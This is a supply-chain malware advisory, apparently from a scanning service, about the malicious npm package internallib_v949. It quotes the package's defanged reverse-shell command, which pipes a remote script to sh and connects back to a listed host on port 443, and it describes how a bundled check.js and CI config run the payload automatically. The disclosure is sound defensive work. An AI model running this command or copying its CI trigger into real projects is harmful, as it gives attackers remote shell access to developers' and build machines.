LWA-2026-12251 MAL-2026-16294 ↗ confirmed malware

internallib_v949@1.0.3

Malicious code in internallib_v949 (npm)

T1059.007 · JavaScriptT1105 · Ingress Tool TransferT1071.001 · Web Protocols

Analysis

The package's only exported function (index.js, command()) executes a reverse shell: it runs `curl hxxps://reverse-shell[.]sh/10[.]0[.]16[.]19:443|sh` via /bin/bash, connecting back to 10[.]0[.]16[.]19 on port 443. The bundled check.js requires the package and invokes command(), and the included .gitlab-ci.yml runs `node check.js`, so the payload also executes in CI pipelines. IOC: reverse-shell.sh / 10[.]0[.]16[.]19:443.

analyzed by
Leitwacht
first seen
Sep 18, 2026, 08:06 PM
analyzed
Sep 18, 2026, 08:07 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.